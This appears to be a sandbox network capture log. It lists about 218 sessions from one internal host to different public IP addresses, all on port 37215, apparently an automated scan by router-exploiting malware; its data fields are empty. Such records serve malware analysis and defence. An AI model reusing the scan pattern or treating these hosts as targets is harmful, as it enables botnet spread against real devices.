                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17738192.168.2.156016845.150.70.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17739192.168.2.156004631.38.221.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17740192.168.2.155722637.82.173.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17741192.168.2.153409045.83.33.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17742192.168.2.1533744121.236.59.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17743192.168.2.153749694.254.167.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17744192.168.2.1558060121.186.210.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17745192.168.2.154660841.156.51.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17746192.168.2.1560334156.63.222.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17747192.168.2.1560124138.203.187.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17748192.168.2.1542722181.243.219.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17749192.168.2.1555960156.214.112.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17750192.168.2.1540658157.200.35.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17751192.168.2.1546570222.88.41.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17752192.168.2.154105094.198.191.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17753192.168.2.1542248138.83.66.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17754192.168.2.1556966222.42.202.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17755192.168.2.1560116190.25.74.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17756192.168.2.1557720190.48.119.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17757192.168.2.153916837.9.225.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17758192.168.2.1559640190.14.154.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17759192.168.2.1557162138.180.36.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17760192.168.2.1559140211.146.254.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17761192.168.2.1533732197.124.185.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17762192.168.2.1549186102.253.142.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17763192.168.2.1551854181.191.54.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17764192.168.2.1555462222.67.209.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17765192.168.2.1543278186.44.229.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17766192.168.2.1541198157.85.52.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17767192.168.2.155121837.235.26.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17768192.168.2.154419437.36.201.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17769192.168.2.155665641.158.236.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17770192.168.2.1560510157.94.181.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17771192.168.2.155167694.20.192.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17772192.168.2.1548276197.238.170.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17773192.168.2.155817694.160.104.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17774192.168.2.1542702181.118.241.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17775192.168.2.1538480138.158.60.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17776192.168.2.1545196197.110.138.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17777192.168.2.153573031.112.248.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17778192.168.2.1559002222.52.214.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17779192.168.2.1541180102.67.119.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17780192.168.2.1541478157.65.60.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17781192.168.2.1539782156.18.143.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17782192.168.2.153605241.20.222.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17783192.168.2.1544084156.6.191.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17784192.168.2.153442431.87.150.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17785192.168.2.156063231.47.200.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17786192.168.2.1539716181.71.90.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17787192.168.2.1533512105.30.233.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17788192.168.2.1543234102.194.245.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17789192.168.2.153424841.19.124.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17790192.168.2.1559172138.7.194.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17791192.168.2.1555406181.79.235.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17792192.168.2.1550480122.138.66.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17793192.168.2.155485641.92.99.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17794192.168.2.1533070122.108.216.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17795192.168.2.1545738122.24.93.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17796192.168.2.1535296156.102.251.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17797192.168.2.1542642186.230.14.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17798192.168.2.1553490138.104.141.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17799192.168.2.156097694.113.81.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17800192.168.2.1552286184.231.245.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17801192.168.2.155238879.108.72.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17802192.168.2.1541590222.216.228.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17803192.168.2.155441445.39.48.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17804192.168.2.155425037.157.209.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17805192.168.2.154142637.205.75.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17806192.168.2.1538092197.111.173.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17807192.168.2.1552014121.43.132.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17808192.168.2.1551188122.74.119.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17809192.168.2.155001831.96.198.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17810192.168.2.1536892138.55.246.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17811192.168.2.1558314102.107.166.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17812192.168.2.154590841.174.70.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17813192.168.2.1549210186.24.114.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17814192.168.2.1536748122.202.19.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17815192.168.2.1549152156.122.99.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17816192.168.2.1555888190.23.133.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17817192.168.2.1545578121.24.240.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17818192.168.2.154435494.58.22.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17819192.168.2.1535594181.93.45.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17820192.168.2.1535048197.32.50.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17821192.168.2.1533988121.3.27.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17822192.168.2.1542098222.251.234.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17823192.168.2.154549041.244.168.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17824192.168.2.1542678138.55.248.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17825192.168.2.154504045.155.212.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17826192.168.2.153575841.67.53.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17827192.168.2.1536022181.248.68.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17828192.168.2.154764045.130.61.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17829192.168.2.1547890181.95.30.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17830192.168.2.1541664181.182.115.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17831192.168.2.1535762138.108.62.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17832192.168.2.1533048138.33.222.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17833192.168.2.1558550156.200.26.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17834192.168.2.1538418157.4.108.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17835192.168.2.1544660122.79.31.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17836192.168.2.1556254197.148.24.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17837192.168.2.155790431.205.20.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17838192.168.2.1539688197.22.98.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17839192.168.2.1557620222.190.132.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17840192.168.2.155303231.128.130.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17841192.168.2.1543118102.129.233.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17842192.168.2.154491245.89.171.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17843192.168.2.1560856186.231.215.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17844192.168.2.1552112157.15.9.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17845192.168.2.155742031.26.15.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17846192.168.2.1542078222.198.146.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17847192.168.2.155611237.34.225.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17848192.168.2.1547404190.79.59.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17849192.168.2.1543082190.73.99.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17850192.168.2.1560210190.11.40.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17851192.168.2.154040237.224.1.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17852192.168.2.154764845.222.217.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17853192.168.2.1537372222.239.179.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17854192.168.2.1539084138.180.103.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17855192.168.2.1545048102.208.135.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17856192.168.2.1536652138.141.140.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17857192.168.2.1552918118.171.197.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17858192.168.2.1557134138.133.70.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17859192.168.2.1538264181.53.10.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17860192.168.2.1534048157.75.247.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17861192.168.2.154999494.155.166.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17862192.168.2.1535988102.144.92.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17863192.168.2.1543230157.92.101.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17864192.168.2.1540772157.27.159.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17865192.168.2.1540508138.43.40.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17866192.168.2.1544834138.123.18.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17867192.168.2.1542968102.236.169.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17868192.168.2.1536790181.57.115.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17869192.168.2.154037837.244.123.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17870192.168.2.1549192138.187.133.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17871192.168.2.1558976197.64.138.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17872192.168.2.154279831.167.45.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17873192.168.2.1556372156.234.87.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17874192.168.2.155230445.4.37.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17875192.168.2.155472431.83.196.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17876192.168.2.1538784157.1.27.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17877192.168.2.155829231.44.176.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17878192.168.2.153799837.167.82.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17879192.168.2.1534418138.0.181.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17880192.168.2.155824045.112.47.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17881192.168.2.1553000197.121.69.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17882192.168.2.153450437.242.233.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17883192.168.2.1537898121.241.47.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17884192.168.2.1546470122.231.89.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17885192.168.2.155466241.190.136.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17886192.168.2.1544060156.154.31.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17887192.168.2.1543544181.13.63.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17888192.168.2.1559356222.205.195.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17889192.168.2.154231431.225.44.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17890192.168.2.1546394102.101.239.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17891192.168.2.1558596199.108.56.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17892192.168.2.1550212197.206.193.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17893192.168.2.153374845.44.250.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17894192.168.2.1544666181.25.42.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17895192.168.2.1558412121.75.232.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17896192.168.2.153957470.14.136.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17897192.168.2.153534231.254.197.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17898192.168.2.154416094.212.48.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17899192.168.2.1549914151.116.48.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17900192.168.2.1535382107.166.114.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17901192.168.2.1535942156.180.63.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17902192.168.2.153404893.206.98.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17903192.168.2.1545556172.107.185.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17904192.168.2.1535048122.120.5.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17905192.168.2.1535346186.221.107.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17906192.168.2.1534990157.247.118.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17907192.168.2.1554080157.0.186.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17908192.168.2.153864231.203.149.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17909192.168.2.154095641.215.1.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17910192.168.2.1545328190.187.154.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17911192.168.2.1550144186.29.175.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17912192.168.2.153300841.218.36.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17913192.168.2.155522294.92.240.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17914192.168.2.1535206102.142.4.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17915192.168.2.1536800181.16.185.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17916192.168.2.1556984157.47.127.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17917192.168.2.155046045.49.233.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17918192.168.2.153747837.187.7.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17919192.168.2.1540746122.7.42.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17920192.168.2.1538566181.25.102.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17921192.168.2.153683294.49.141.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17922192.168.2.1556782102.9.190.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17923192.168.2.1560568122.71.125.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17924192.168.2.155347645.96.194.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17925192.168.2.1549462138.253.124.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17926192.168.2.1555018222.249.220.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17927192.168.2.1538716186.237.52.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17928192.168.2.1547074122.56.254.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17929192.168.2.1554590222.132.147.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17930192.168.2.1557474186.127.175.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17931192.168.2.1552250162.252.125.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17932192.168.2.1540096121.1.75.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17933192.168.2.155872245.235.13.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17934192.168.2.154226231.84.105.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17935192.168.2.1544794197.92.210.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17936192.168.2.1547028181.107.147.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17937192.168.2.1534464181.129.62.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17938192.168.2.1538104121.91.178.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17939192.168.2.155201488.227.201.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17940192.168.2.153654031.139.116.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17941192.168.2.1557524122.98.132.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17942192.168.2.1555310138.41.174.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17943192.168.2.1550970157.196.34.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17944192.168.2.154351894.181.100.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17945192.168.2.153429231.142.67.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17946192.168.2.155711637.94.126.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17947192.168.2.1560792102.21.255.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17948192.168.2.1553900190.102.221.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17949192.168.2.156092237.165.68.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17950192.168.2.1556276181.200.146.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17951192.168.2.1540356122.4.121.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17952192.168.2.1544556219.30.222.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17953192.168.2.1557648181.156.94.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17954192.168.2.1552548138.94.120.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17955192.168.2.1549212122.132.239.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
